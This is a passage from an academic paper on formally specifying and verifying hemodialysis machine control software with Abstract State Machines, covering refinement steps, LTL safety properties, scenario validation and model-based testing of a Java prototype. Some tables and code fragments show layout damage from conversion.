THERAPY_RUNNING requires that the THERAPY_EXECution considers subsequent operations on the arterialBolus. Fig. 3 reports some data of the chain of the four models that form the complete specification. While the ground model is rather simple and it has no monitored function and no requirement property, all refinements add functions of all types, rules, and properties, depending on the phase they refer to. Note that the second refinement allows to prove the majority of requirements (40 more w.r.t. the previous refinement), since it models the main part of the therapy. 5.2.1. Ground model As said before, the ground model simply describes the transitions between the phases constituting a hemodialysis treatment, without any additional detail. Code 1 shows the ground model written using the ASMETA concrete syntax. The main rule simply executes rule r.run_dialysis that, depending --- \(^3\)Note that we use INITIATION to denote this phase to be consistent with the case study [48], although the term is misleading. --- ![Figure 3: Models data](image) <table> <thead> <tr> <th>refinement</th> <th>#monitored functions</th> <th>#controlled functions</th> <th>#derived functions</th> <th>#rule declarations</th> <th>#rule</th> <th>#properties</th> </tr> </thead> <tbody> <tr> <td>Ground model</td> <td>0</td> <td>1</td> <td>8</td> <td>5</td> <td>11</td> <td>0</td> </tr> <tr> <td>1st - preparation phase</td> <td>52</td> <td>17</td> <td>8</td> <td>68</td> <td>242</td> <td>6</td> </tr> <tr> <td>2nd - initiation phase</td> <td>91</td> <td>36</td> <td>14</td> <td>143</td> <td>578</td> <td>46</td> </tr> <tr> <td>3rd - ending phase</td> <td>101</td> <td>39</td> <td>15</td> <td>159</td> <td>648</td> <td>52</td> </tr> </tbody> </table> --- Note that we use INITIATION to denote this phase to be consistent with the case study [48], although the term is misleading. Table 1: Hemodialysis device phases <table> <thead> <tr> <th>phase</th> <th>prepPhase</th> <th>tubingSystemPhase</th> <th>PREPARE,HEPARIN</th> <th>treatmentParam</th> <th>rinsePhase</th> <th>INITIATION</th> <th>patientPhase</th> <th>therapyPhase</th> <th>arterialBolusPhase</th> <th>endingPhase</th> </tr> </thead> <tbody> <tr> <td></td> <td>AUTO_TEST</td> <td>CONNECT,CONCENTRATE</td> <td>TUBING_SYSTEM</td> <td></td> <td></td> <td>PREPARATION</td> <td></td> <td></td> <td></td> <td></td> </tr> <tr> <td></td> <td></td> <td>SET,RINSING,PARAM</td> <td></td> <td></td> <td></td> <td>SET,TREAT,PARAM</td> <td></td> <td></td> <td></td> <td></td> </tr> <tr> <td></td> <td></td> <td></td> <td></td> <td></td> <td></td> <td>rinsePhase</td> <td></td> <td></td> <td></td> <td></td> </tr> <tr> <td></td> <td></td> <td></td> <td></td> <td></td> <td></td> <td>initPhase</td> <td></td> <td></td> <td></td> <td></td> </tr> <tr> <td></td> <td></td> <td></td> <td></td> <td></td> <td></td> <td>therapyPhase</td> <td></td> <td></td> <td></td> <td></td> </tr> <tr> <td></td> <td></td> <td></td> <td></td> <td></td> <td></td> <td>THERAPY_RUNNING</td> <td></td> <td></td> <td></td> <td></td> </tr> <tr> <td></td> <td></td> <td></td> <td></td> <td></td> <td></td> <td>endingPhase</td> <td></td> <td></td> <td></td> <td></td> </tr> <tr> <td></td> <td></td> <td></td> <td></td> <td></td> <td></td> <td>ENDING</td> <td></td> <td></td> <td></td> <td></td> </tr> <tr> <td></td> <td></td> <td></td> <td></td> <td></td> <td></td> <td></td> <td></td> <td></td> <td></td> <td></td> </tr> </tbody> </table> - **Phase**: The various phases of the hemodialysis device. - **Preparation**: Preparatory steps before the therapy begins. - **Treatment Parameters**: Parameters to be set during the treatment. - **Rinse**: Steps to rinse the dialyzer. - **Initiation**: Steps to connect the patient. - **Therapy**: Steps to run the therapy. - **Arterial Bolus**: Steps to run an arterial bolus. - **Ending**: Steps to finish the therapy. **Notes**: Each phase includes specific actions such as setting up tubing systems, preparing heparin, rinsing the dialyzer, connecting the patient, and running the therapy. Code 1: Ground model on the current phase, executes the corresponding rule: - \textit{r\_run\_preparation}, refined in the first refinement step (see Sect. 5.2.2); - \textit{r\_run\_initiation}, refined in the second refinement step (see Sect. 5.2.3); - \textit{r\_run\_ending}, refined in the third refinement step (see Sect. 5.2.4). Fig. 4 shows a graphical representation [5] of the ground model, in the two ways supported by ASMETA, \textit{basic visualization} and \textit{semantic visualization}. The basic visualization permits to show the syntactical structure of the ASM in terms of a tree (similar to an AST); the notation is inspired by the classical flowchart notation, using green rhombuses for guards and grey rectangles for rules. The leaves of the tree are the update rules and the macro call rules. For each macro rule in the model, there is a tree representing the definition of the rule; double-clicking on a macro call rule shows the tree of the corresponding macro rule. The basic visualization of the model of Code 1 (starting from rule \textit{r\_run\_dialysis}) is shown in Fig. 4a. The figure shows the visualization provided by the tool when all the macro rules are shown (i.e., the user has double-clicked on all the call rules). The semantic visualization provides a more advanced way of representing ASMs, trying to extrapolate part of the behavior from the model. As observed before, some systems naturally evolve through phases (or modes), called control states in [21], that are represented by a suitable function of the model (called phase function). Phases and transitions between them can sometimes be statically identified directly in the model. This visualization tries to identify a phase function in the model and shows how the system evolves through these phases by the execution of the transition rules. The visualization consists in a graph where control states are shown using orange ellipses. Note that a control state is not an ASM state, but an abstraction of a set of ASM states having the same value for the phase function. The semantic visualization of the ground model is shown in Fig. 4b. The system starts in the PREPARATION phase and moves to the INITIATION phase by executing rule \texttt{r\_run\_preparation}, from which it moves to the ENDING phase by the execution of rule \texttt{r\_run\_initiation}. In the ENDING phase, rule \texttt{r\_run\_ending} is executed, that, however, does not modify the phase. The simple visual inspection was sufficient to give us confidence that the model correctly evolves through the three top-level phases. In the following refinement steps, we will only show the semantic visualizations of the models. The complete textual specifications are available online\(^4\). 5.2.2. First refinement: preparation phase The first refinement extends the ground model by refining the PREPARATION phase. As shown in Fig. 5a, the preparation consists in a sequence of activities, specified by function \texttt{prepPhase}. For each value of \texttt{prepPhase}, a given rule performs some actions related to the device preparation and updates \texttt{prepPhase} to the next value. Examples of these activities are the concentrate connection and the dialyzer rinsing. As shown in Table 1, some phases are further divided in sub-phases. For example, Fig. 5b shows how phase \texttt{SET\_TREAT\_PARAM} is specified by the treatment parameter (function \texttt{treatmentParam}). Also in this case, the sub-phases are executed in sequence. The correctness of each refinement step has been proved with the refinement prover integrated in ASMETA that checks a particular kind of \(^4\)Models are available at \url{http://fmse.di.unimi.it/sw/SCP2017.zip} refinement called stuttering refinement \[11]. A model \( R \) is a correct stuttering refinement of a model \( A \) iff for each run \( \rho^R \) of \( R \) there is a run \( \rho^A = S_1, S_2, \ldots, S_n \) of \( A \) such that \( \rho^R \) can be split in sub-runs \( \rho_1^R, \rho_2^R, \ldots, \rho_n^R \) where all the states of \( \rho_i^R \) are conformant with \( S_i \) (\( i = 1, \ldots, n \)), according to a given conformance relation \( \equiv \). As conformance relation, we usually use the equality between some selected locations (called locations of interests) of the two models. The first refined model is a correct stuttering refinement of the ground model, using as conformance relation the equality on the phase function. Fig. 6 shows the correspondence of a refined run with an abstract run. We can see that, in the run of the ground model (abstract run), the machine goes from a state in which phase is PREPARATION to a state in which phase is INITIATION in one step. Instead, in the run of the refined model (refined run), there is a sequence of intermediate states in which phase remains in PREPARATION. These states are all conformant with the first abstract state. The state in the refined run in which phase becomes INITIATION is conformant with the second abstract state. Validation and Verification. Starting from the first refinement, we applied model review. Common vulnerabilities and defects that can be introduced during ASM modeling are checked as violations of suitable meta-properties (MPs, defined in [7] as CTL formulae). The violation of a meta-property means that a quality attribute (minimality, completeness, consistency) is not guaranteed, and it may indicate the presence of an actual fault (i.e., the ASM is indeed faulty), or only of a stylistic defect (i.e., the ASM could be written in a better way). In this model, we found that controlled function machine.state was initialized but never updated (violation of meta-property MP7 that requires that every controlled location is updated and every location is read). Although this is not a real fault of the model, it could make the model less readable, since a reader may expect an update of the function (since it is controlled). Declaring the function static made apparent that, in this refinement step, the function is not updated. When modeling other case studies [3, 12, 14], we extensively used interactive simulation [33] that allowed us to observe some particular system executions. In this case study, we could largely reduce the effort spent in simulation, since by semantic visualization we could get a feedback regarding the control flow similar to that provided by simulation. Fig. 7 shows a simulation trace (two steps) of the current model: the values chosen by the user for the monitored functions are shown in the monitored part of the state, while the updates computed by the machine are shown in the controlled part. Transitions between phases can be discovered also through simulation, but in a less direct way than with semantic visualization (see Fig. 5a). A further advantage of semantic visualization is that it also shows the rule that changes a given phase. However, simulation shows ASM states, whereas semantic visualization only shows control states given by the value of the phase function. Therefore, if we are interested in observing the exact ASM runs, Figure 6: Hemodialysis case study – Relation between a refined run and an abstract run we still have to use simulation. Instead, if we are only interested in knowing how the machine evolves through its phases, the semantic visualization is enough. Instead of interactive simulation, we mainly performed scenario-based validation [26] that permits to automatize the simulation activity, so scenarios can be re-run after specification modifications. In scenario-based validation the designer writes a scenario specifying the expected behavior of the model; scenarios are similar to test cases. The validator reads the scenario and executes it using the simulator. The validator language provides constructs to express scenarios as interaction sequences consisting of actions committed by the user to set the environment (i.e., the values of monitored/shared functions), to check the machine state, to ask for the execution of certain transition rules, and to enforce the machine itself to make one step (or a sequence of steps by command step until) as reaction to the user’s actions. We wrote several scenarios for the different refinement steps. We discovered that such scenarios had several common parts, since they had to perform the same actions and same checks in different parts of their evolution. Therefore, we extended the validator with the possibility to define blocks of actions that can be reused in different scenarios: a block is a named sequence of commands delimited by keywords begin and end. A command block can be defined in any scenario and can be called by means of the command execblock in other parts of the same scenario or in other scenarios. A block can also be nested. Code 2: Scenario for the first refinement in another block. Code 2 shows an example of scenario for the first refined model reproducing the whole therapy process. We defined the block initStatePrep, since its instructions regarding the initial state will be reused in scenarios written for other refinement steps. We also defined the block preparationPhase containing instructions related to the PREPARATION phase. Such block is further divided in sub-blocks (e.g., automaticTest); indeed, some scenarios will reuse the whole block preparationPhase, while others will reuse only some sub-blocks and redefine some others. Once a modeler is confident enough that the model correctly reflects the intended requirements, heavier techniques can be used for property verification. The case study document [48] reports a list of safety requirements (divided between general (S1-S11) and software (R1-R36) requirements) that must be guaranteed. We have specified them as LTL properties and verified using the integrated model checker [6] that translates ASM models to models of the model checker NuSMV. Whenever a property is violated, the designer can inspect the returned counterexample to understand whether the problem is in the model that is actually faulty, or in the property that wrongly specifies the requirement; since counterexamples are returned as ASM runs, such task should be easy for the developer. Note that, thanks to meta-property MP10 of the model reviewer, we are also able to detect whether a property is vacuously satisfied, i.e., it is true regardless the truth value of some of its sub-expressions. Since NuSMV works on finite state models, we have slightly modified our models by abstracting all the infinite domains with finite ones. As future work, we plan to support the translation to nuXmv [52] that allows the verification of infinite state systems. Each requirement has been proved as soon as possible in the chain of refinements, i.e., in the model that describes the elements involved in the requirement. At this refinement step, we were able to express only 13 of the 47 requirements; these are software requirements regarding the flow of bicarbonate concentration into the mixing chamber, the heating of the dialyzing fluid, and the detection of safety air conditions. For example, requirement R20 states that “if the machine is in the preparation phase and performs priming or rinsing or if the machine is in the initiation phase and if the temperature exceeds the maximum temperature, then the software shall disconnect the dialyzer from the DF and execute an alarm signal.” The requirement has been formalized in LTL as follows. //R20 \[ g((\text{phase} = \text{PREPARATION} \land \text{dialyzer}.\text{connected} \land \text{prepPhase} = \text{RINSE} \land \text{not error(TEMP}.\text{HIGH}) \land \text{current_temp} = \text{HIGH}) \Rightarrow x(\text{error(TEMP}.\text{HIGH}) \land \text{alarm(TEMP}.\text{HIGH}) \land \text{not dialyzer}.\text{connected} \land \text{status})) \] Note that some requirements are strictly related and somehow redundant and, therefore, can be verified together with only one property. This is the case of requirements R18 and R19, and requirements R23-R32. //R18--R19 \[ g((\text{phase} = \text{PREPARATION} \land \text{prepPhase} = \text{RINSE} \land \text{dialyzer}.\text{connected} \land \text{not error(DF}.\text{PREP}) \land \text{preparing DF} \land \text{not detect_bicarbonate}) \Rightarrow x(\text{error(DF}.\text{PREP}) \land \text{alarm(DF}.\text{PREP}) \land \text{not dialyzer}.\text{connected} \land \text{status})) \] //R23--R32 \[ g((\text{phase} = \text{PREPARATION} \land \text{prepPhase} = \text{TUBING} \land \text{passed1Msec} \land \text{currentSAD} = \text{PERMITTED} \land \text{current_air_vol} = \text{PERMITTED} \land \text{not error(SAD}.\text{ERR})) \Rightarrow x(\text{error(SAD}.\text{ERR}) \land \text{alarm(SAD}.\text{ERR})) \] Requirements R20 and R23-R32 are related both to the preparation and initiation phases; R23-R32 also consider the ending phase. At this level of refinement, the corresponding properties can only check the preparation phase; they will be refined in the second refinement to take into consideration the initiation phase (see Sect. 5.2.3), and in the third refinement for considering the ending phase (see Sect. 5.2.4). 5.2.3. Second refinement: initiation phase The second refinement extends the first one by refining the INITIATION phase. As shown in Table 1, the phase is further divided into two phases (recorded by function initPhase): the connection of the patient (CONNECT_PATIENT) and the running of the therapy (THERAPY_RUNNING). As shown in Fig. 8a, function patientPhase indicates in which step the patient is during the connection. We can see that the patient is initially connected arterially; then the blood pump is activated to extract the blood from the patient. (in state BLOOD_FLOW). In this state, rule r_set_blood_flow can follow two different paths: - **patientPhase** is updated to FILL_TUBING. Then, the operator sets the blood flow and the blood pump stops when the blood fills the tubes between the patient and the dialyzer. After this, the patient is connected venously and the blood pump is restarted to fill the tubes between the dialyzer and the patient’s vein. - **patientPhase** is updated to END_CONN. Then, the therapy can start (i.e., initPhase goes to THERAPY_RUNNING). Note that, in this case, the semantic visualization is not sufficient to completely understand the model behavior, since the paths are taken in two subsequent executions of the rule. This can only be discovered by simulation. The therapy status is specified by function therapyPhase (see Fig. 8b). When the therapy status is THERAPY_EXEC, it is further specified by function arterialBolusPhase, whose semantic visualization is shown in Fig. 8c. Such sub-phase consists in the infusion of saline solution and it is activated by the operator. arterialBolusPhase is initially in state WAIT_SOLUTION until the operator presses the start button. After that, the doctor sets the volume of the saline solution, the solution is connected to the machine, and the infusion starts. When the predefined volume is infused, the arterialBolusPhase returns to WAIT_SOLUTION state until the operator restarts again the saline infusion. Also in this case, semantic visualization does not allow to fully understand the machine behavior: the initial state of the graph in Fig. 8c can only be discovered through simulation. As required by our modeling process, before any further validation and verification activity of the requirements, it is necessary to guarantee correctness of the refinement step. This has been carried out, similarly to what described at the end of Sect. 5.2.2, by means of the refinement prover. **Validation and Verification.** By model review, we found that some locations were trivially updated (meta-property MP4), i.e., that the value of the location before the update was always equal to the new value. This means that the update is not necessary. Removing trivial updates is important because the reader may have the feeling that the ASM is modifying its state when it is not. The trivial updates were related to signal_lamp when updated to GREEN, and error(UF_DIR) and error(UF_RATE) when updated to true. The update of signal_lamp was indeed unnecessary and we removed it; the updates of error(UF_DIR) and error(UF_RATE), instead, were not correct. since the locations had to be updated to false and so we fixed the fault. Moreover, we detected some violations of meta-property MP7 requiring that every controlled location is updated and every location is read. We found that functions bf_err_ap_low, reset_err_pres_ap_low were never updated: this was due to a wrong guard in a conditional rule. This shows that model review is also useful in detecting behavioral faults. We found that also locations error(ARTERIAL_BOLUS_END), error(UF_BYPASS), and error(UF_VOLUME_ERR) were never updated. This is due to the fact that functions error and alarm share the domain AlarmErrorType representing the different alarms; for each alarm there is an error, except for ARTERIAL_BOLUS_END, UF_BYPASS, and UF_VOLUME_ERR. Therefore, locations error(ARTERIAL_BOLUS_END), error(UF_BYPASS), and error(UF_VOLUME_ERR) are actually unnecessary. We could have declared two different domains for errors and alarms, but we think that the specification would have been less clear and it would have been more difficult to keep the values of errors and alarms consistent. Therefore, we ignored the meta-property violation without changing the model. We also wrote some scenarios for this refinement step, as the one shown in Code 3. We can see that the scenario reuses blocks initStatePrep and preparationPhase defined in scenario completeTherapyRef1 for the first refined model (see Code 2). At this modeling level, we were able to prove 23 more safety requirements. They concern patient connection, infusion of the saline solution when the patient is connected to the extra-corporeal blood circuit, pressure during the therapy, dialyzing fluid temperature, heparin infusion, air detected in the --- **Code 3: Scenario for the second refinement** ```plaintext scenario completeTherapyRef2 load HemodialysisRef2.asm begin initStateInit execblock completeTherapyRef1.initStatePrep; check patientPhase = CONN_ART; check arterialBolusPhase = WAIT_SOLUTION; ... end execblock completeTherapyRef1.preparationPhase; ``` begin initiationPhase begin patientConnection check phase = INITIATION; check initPhase = CONNECT_PATIENT; check patientPhase = CONN_ART; set art_connected := true; step... end end check phase = ENDING; step ``` blood, and ultrafiltration process. Among these, we realized that some were not correctly described in [48]. For example, S1 states that “arterial and venous connectors of the EBC are connected to the patient simultaneously.” The corresponding LTL property is as follows \[ g(\text{art}_{\text{connected}} \iff \text{ven}_{\text{connected}}) \] However, the property is false because the patient is connected before to the arterial connector and then to the venous connector. Other requirements are instead ambiguous and so we had problems in formalizing them. For example, S5 states that “the patient cannot be connected to the machine outside the initiation phase, e.g., during the preparation phase.” We did not know how to interpret “be connected”: as the patient status of being attached to the machine, or as the atomic action performed by the operator of connecting the patient to the machine? The former interpretation would require to prove the following property: \[ g((\text{art}_{\text{connected}} \lor \text{ven}_{\text{connected}}) \implies \text{phase} = \text{INITIATION}) \] that, however, is false. Indeed, the patient can be attached to the machine also outside the INITIATION phase. The former interpretation, instead, would require to prove the two following properties: \[ g((\neg \text{art}_{\text{connected}} \land \text{x}(\text{art}_{\text{connected}})) \implies \text{phase} = \text{INITIATION}) \] \[ g((\neg \text{ven}_{\text{connected}} \land \text{x}(\text{ven}_{\text{connected}})) \implies \text{phase} = \text{INITIATION}) \] that are actually both true. It may be the case that this interpretation is not correct; this is a clear example of ambiguous requirement that would need a clarification from the stakeholders. Ambiguity also characterizes requirements S2, S6, S7, and R16, for which we were not able to provide a satisfactory formalization. For example, S6 requires that BP cannot be used outside the INITIATION phase; however, Sect. 3.2 of [48] states that BP must also be used in the ENDING phase: therefore, we were not sure how to interpret and formalize such requirement. In this refinement step, we could refine properties related to requirements R20 and R23–R32 to take into consideration also the initiation phase. //R20 updated \[ g(((\text{phase} = \text{INITIATION} \land \neg \text{error}(\text{TEMP}\_\text{HIGH}) \land \text{current}\_\text{temp} = \text{HIGH}) \lor (\text{phase} = \text{PREPARATION} \land \text{dialyzer}_{\text{connected}} \land \text{prepPhase} = \text{RINSE}\_\text{DIALYZER} \land \neg \text{error}(\text{TEMP}\_\text{HIGH}) \land \text{current}\_\text{temp} = \text{HIGH})) \implies \text{x}(\text{error}(\text{TEMP}\_\text{HIGH}) \land \text{alarm}(\text{TEMP}\_\text{HIGH}) \land \neg \text{dialyzer}_{\text{connected}})) \] //R23–R32 updated 5.2.4. Third refinement: ending phase The third refinement extends the second one by refining the ENDING phase. As shown in Fig. 9a, the ending consists in a sequence of activities (specified by function endingPhase). When in REINFUSION, the phase is further refined by reinfusionPhase, whose semantic visualization is shown in Fig. 9b. The reinfusion consists in an initial sequence of activities for starting the infusion of the saline solution, followed by a loop in which the doctor performs the solution reinfusion. Rule \texttt{r\_choose\_next\_reinf\_step} is responsible for deciding the loop termination: either going to START_SALINE_REIN (i.e., the operator decides to continue the reinfusion) or to REMOVE_VEN (i.e., the operator disconnects the patient). To complete modeling at this level, the refinement prover was used to prove that this model is a correct stuttering refinement of the second refinement. **Validation and Verification.** We applied model review also to this model, but we did not find any meta-property violation. We also wrote some new scenarios. In particular, we wrote scenarios for reproducing the occurrence of some errors. Code 4 shows the scenario that triggers error TEMP_HIGH related to high temperature of the dialyzer fluid during the preparation phase. We can see that in this scenario we reused some sub-blocks of block preparationPhase defined in scenario completeTherapyRef1 (see Code 2) as, for example, automaticTest and connectConcentrate. We did not use the whole block because the instructions related to the dialyzer rinsing had to be changed in order to trigger the error. In this refinement step, we were able to prove three more requirements. Moreover, we could refine the property related to requirements R23-R32 in order to take into consideration also the ending phase. ```plaintext // R23–R32 updated \( g((((\text{phase} = \text{PREPARATION} \text{ and prepPhase} = \text{TUBING_SYSTEM}) \text{ or (phase} = \text{INITIATION} \text{ and bp.status.der = START}) \text{ or (phase = ENDING and endingPhase = REINFUSION and not error.rein_press and bp.status.der = START}) \text{ and (passed1Msec and currentSAD \(\neq\) PERMITTED and current_air_vol \(\neq\) PERMITTED and not error(SAD_ERR)))) implies x(error(SAD_ERR) and alarm(SAD_ERR))) \text{ implies x(error(SAD_ERR) and alarm(SAD_ERR))}) \) ``` Code 4: Scenario for the third refinement – Triggering of error TEMP_HIGH Note that there are four requirements (S3, S8, S9, and S10) that we do not consider in our work. They are all related to the blood flow rate; for example, S8 requires that the “blood flow rate should be adjusted, taking into consideration the AP” [48]. However, since continuous values have been discretized for doing model checking, we are not able to express such requirements as temporal properties. As said before, as future work we plan to provide a mapping from ASM to nuXmv [52] that allows the verification of infinite states systems: in this way, we will also be able to verify such kind of requirements. 5.3. Conformance checking We do not have access to the implementation of the hemodialysis device. Therefore, we have built a prototypical implementation in Java of the hemodialysis device software, in order to show the last part of the ASM-based process, i.e., the conformance checking between the implementation and the specification) and how the process can help perform the activities required by steps 5.5-5.7 of the IEC 62304 standard, as well as step 5.8 on subsequent releases of medical software. Techniques of conformance checking are also useful for validation coverage and re-verification of software upon changes, as required by the FDA principles. The implementation faithfully reflects (or, at least, it should) the case study requirements; however, some components (e.g., the connection with the hardware) have not been implemented and so they have been substituted with mock objects. Part of the Java implementation is shown in Code 5. Note that the implementation has many details that are not present in the specification, as the graphical user interface (shown in Fig. 10) that allows to visualize the output of the device. The top part of the GUI shows the current state of the device, the bottom left part displays the status of alarms and errors (red means that there is an alarm/error, while green means that the component is working properly), and the bottom right part reports the configuration of the parameters. The implementation has been developed by two authors who were only partially involved in the writing of the specification; in this way, we aimed at reproducing a setting in which the system designers (also responsible for model-based testing) are different from the developers. Conformance checking can be done offline (i.e., before the deployment) by MBT or online (i.e., after the deployment) by runtime verification. We import org.asmeta.monitoring.*; public class HemodialysisMachine { HemodialysisMachinePanel dialog; @FieldToFunction(func = "phase") Phases phase = Phases.PREPARATION; @FieldToFunction(func = "preparing_DF") boolean preparing_DF = false; @FieldToFunction(func = "initPhase") InitPhase initPhase = InitPhase.CONNECT_PATIENT; @FieldToFunction(func = "interrupt_dialysis") boolean interrupt_dialysis = false; @FieldToFunction(func = "error_heparin_resolve") boolean error_heparin_resolve = false; @Monitored(func = "blood_conductivity") int blood_conductivity = HIGH; } public HemodialysisMachine() { dialog = new HemodialysisMachinePanel(this); dialog.setDefaultCloseOperation(JDialog.DISPOSE_ON_CLOSE); dialog.setVisible(true); } @RunStep public void execDialysis() { if (phase == Phases.PREPARATION) { ... dialog.updateGUI(); } @MethodToFunction(func="error") public boolean error(AlarmErrorType aet) { return error[aet.ordinal()]; } } Code 5: Java implementation of the HMCS Figure 10: Hemodialysis device program GUI here show the application of the former approach to the case study and we refer the reader to [8, 12] for examples of applications of the latter approach. In MBT [35, 61], abstract test sequences are derived from the specification; such sequences are then concretized in tests for the implementation. In order to generate abstract test sequences, we use the MBT feature of ASMETA [32] that first derives from the specification some test goals (called test predicates) according to some coverage criteria [31], and then generates sequences for covering these goals. For example, the update rule coverage criterion requires that each update rule is executed at least once in a test sequence and the update is not trivial (i.e., the new value is different from the current value of the location). A classical approach based on model checking is used for generating tests: the ASM model is translated in the language of a model checker, and each test goal is expressed as a temporal property (called trap property); if the trap property is proved false, the returned counterexample is the abstract test sequence covering the test goal (and possibly also other test goals). For this work, we extended the ASMETA MBT component in order to work with the model checker NuSMV. For the case study, we used the structural coverage criteria presented in [32]. Since the test generation approach is based on model checking, we used the same models we obtained to perform formal verification (having only finite domains). 980 test predicates have been built and 183 tests have been generated for covering them (in around 2 hours on a Linux PC with Intel(R) Core(TM) i7 CPU, 8 GB of RAM). Note that each generated test can cover more than one test predicate and we avoid generating tests for already covered test predicates. An example of test predicate for the update rule coverage criterion is: \[ \text{phase = INITIATION and initPhase = THERAPY\_RUNNING and therapyPhase = THERAPY\_EXEC and interrupt\_dialysis and therapyPhase != THERAPY\_END} \] requiring to observe a state in which the update rule of therapyPhase to THERAPY\_END fires and therapyPhase is not already equal to THERAPY\_END. Note that a sequence covering this test predicate is guaranteed to exist if the specification has been previously checked with model review and no violation of MP4 (requiring that all the update rules are not always trivial) occurred. The sequence covering the predicate is shown in Fig. 11. We can see that the test predicate holds in the last state of the sequence. In order to concretize the abstract test sequences into tests for the implementation, we need to provide a linking between the specification and the implementation. In [8], we proposed a technique to do the linking using Java annotations. We defined different annotations to: - associate a Java class with the corresponding ASM model (@Asm); - associate the ASM state with the Java state: - @FieldToFunction connects a Java field with an ASM controlled function; - @MethodToFunction connects a Java pure (i.e., returning a value but not modifying the object state) method with an ASM controlled function; - @Monitored connects a Java field with an ASM monitored function; such fields represent the inputs of the Java class that take their value from the environment (as monitored functions in ASMs). - associate the ASM behavior with the Java object behavior; @RunStep is used to annotate methods whose execution corresponds to a step of the ASM model. Given the mapping provided by the Java annotations, we translated abstract test sequences in JUnit tests following the technique described in [9]. For example, Code 6 shows the JUnit test corresponding to the sequence shown in Fig. 11. Each test is built by creating the initialization of the Java class and then, for each state of the corresponding abstract test sequence, - updating the fields annotated with @Monitored to the values of the corresponding ASM functions. In the example, field `interrupt_dialysis` is updated to the value of the homonymous ASM function. - invoking the method annotated with @RunStep. In the example, method `execDialysis()` (see Code 5) is executed. - adding JUnit assert commands that check that the Java state is conformant with the ASM state; they check that the values of the fields annotated with @FieldToFunction and the values returned by the methods annotated with @MethodToFunction are equal to the values of the corresponding ASM functions. In the example, fields `phase`, `initPhase`, `therapyPhase`, ... are linked with @FieldToFunction and checked during conformance checking. We run all the 183 tests (divided in multiple JUnit files) and we actually found some conformance violations (i.e., some tests failed. See Fig. 12a). We analyzed the failing tests and we discovered that the authors writing the implementation misunderstood some requirements. Consequently, the errors were fixed. The coverage obtained by the tests is shown in Fig. 12b: our tests were able to cover more than 90% of the Java code. Although the obtained coverage is already high, we found that some parts of the code are not covered, since the structure of the code in some parts is different from the structure of the specification and using structural coverage criteria for test generation may not guarantee the full coverage. We plan to study other criteria (like MCDC (Modified Condition Decision Coverage) or property-based) in order to improve the coverage. 6. Related work and comparison with other approaches The use of rigorous methods is escalating for the engineering of medical device software in recent times. A systematic review of the use of formal methods for medical software is presented in [20]; we here report those works that are more related to the approach presented in this paper. In the past, formal methods have been applied to a variety of medical devices. Osaiweran et al. [54] use the formal Analytical Software Design (ASD) [23] approach for the development of a power control service of an interventional X-ray system. Jiang et al. [42] present a methodology based on timed automata to extract timing properties of heart that can be used for the verification and validation of implantable cardiac devices. Méry et al. [51] and Macedo et al. [47] present a pacemaker model in Event-B [1] and VDM [43] methods, respectively. One of the medical devices relatively close to hemodialysis machines is the infusion pump. It is primarily responsible for delivering fluids, such as nutrients and medications, into a patient’s body in controlled amounts. Arney et al. [16] present a reference model of PCA (Patient Control Analgesia) infusion pumps and test the model for structural and safety properties. Campos et al. [25] present a formal model in MAL (Modal Action Logic) [24] that helps compare different infusion devices and their provided functionalities. Bowen et al. [22] use the ProZ model checker [55] to test various safety properties of infusion pumps. Considering the HMCS, Hoang et. al. [36] present an Event-B [1] inspired solution. The main difference of the approach is the usage of a multi-formal development paradigm where the requirements are modeled using the UML-like notation iUML-B [57] and then subsequently verified in the formal framework of Event-B using the deductive theorem proving and model checking. The approach also lets the specification be validated using animation and Domain Specific Visualizations (DSVs). A similar Event-B based solution is also presented in [49, 50]. In this work, the requirements are specified using a refinement-based modeling approach, and are then checked for consistency and conformance using the standard theorem proving, model checking, and animation techniques. The resulted formal requirements model is fed to a code generator that transforms the formal model into a sequential programming language code that runs on the given hardware. The translation process is semi-automatic and requires post-processing of the generated code before the final deployment. The main limitation of the approach is that the supported tool only translates a limited subset of the B syntax during the automatic translation process. Moreover, a formal proof that the translation process preserves the safety properties of the model is missing. The solution presented by Banach [17] is based on Hybrid Event-B [18], an extension of the Event-B framework to explicitly focus on continuously varying state evolution, along with the usual discrete state transitions. The main difference of this approach comes from its ability to explicitly distinguish between discrete and continuous elements of hemodialysis machines. The resulted specification consists of two types of state transitions: the natural discrete changes of state and continuously varying state changes. The model takes the individual discrete events of the model and interleaves them with continuous events. This allows to specify the complete behavior of hemodialysis machines considering both discrete as well as continuous elements. The drawback of the approach is the limited tool support. Hybrid Event-B relies on the Rodin platform [2] for specification and proving. However, not all features of Hybrid Event-B are supported by the Rodin platform, e.g., how to specify (and consequently prove) events capturing continuously changing behaviors (also known as pliant events), or single- and multi-machine systems in general. The solution presented by Fayolle et. al. [29] is based on a combination of Algebraic State-Transition Diagrams (ASTD) [30] and Event-B. ASTD use a graphical notation to model problems as a combination of state transition diagrams and classical process algebra operators like sequence, iteration, parallel composition, quantified choice, and quantified synchronization. The main difference of this solution comes from a multi-formal approach and the way how the sequencing order of the machine is described. Due to the use of a graphical notation, the model is easy to follow and validate. For verification purposes, the model relies on the strength of the Event-B platform that stems from theorem proving and model checking. However, this means that the approach also suffers from the limitations associated with the Event-B method and its toolset. Some of these limitations are: lack of sophisticated tools and elaborated guidelines for managing the complexity of growing models by decomposition, lack of an implicit notion of time (this will be necessary for an elegant expression of timing properties which play a critical role in medical devices), and failure of ProB [45] (at the detailed level of refinements) to prove temporal properties of the system due to state space enumeration and explosion problems. In our opinion, a standard and more natural way is required to specify and prove that temporal properties of the system are preserved by Event-B refinements. Finally, a tool that is able to automatically generate ready-to-deploy machine code from Event-B formal models is also missing; currently available tools require manual post-processing of the generated code. The solution presented by Gomes et. al. [34] is based on Circus [53], a fusion of the formal notation Z [59] and Communicating Sequential Processes (CSP). The main difference of this solution model is the use of a well-defined theory of process algebra to specify the concurrent and parallel aspects of the system and explicit focus on timing properties. The main limitation of the approach is that no tool currently exists that directly supports the consistency and conformance checking of a Circus specification. In the current development, the Circus model is translated into a machine-readable CSP which is then model checked for verification purposes. The lack of automatic code generation from Circus models is another limitation. Explicitly regarding the problem of software certification, there exist few attempts addressing this problem, like the CHI+MED project [27] which presents a formal methodology for certification and assurance of medical devices. More in general, Jetley et. al. [41] advocate the use of formal methods for medical software quality assessment. However, there is no standardized mapping between formal method processes and certification activities and this paper tries to contribute in establishing one. The main novelty of our work, in relation to the comparative dialysis models and other applications of formal methods to medical device software, comes from its rigorous approach to quality assurance and easy to understand formal notation. A comprehensive model analysis approach based on simulation, model review, model checking, and conformance checking, gives a grasp on the notion of correctness far better than the approaches which are comprised of only a subset of the employed analysis techniques in this work. Additionally, ASM method’s ease of use, understandability and notion of refinement also help manage 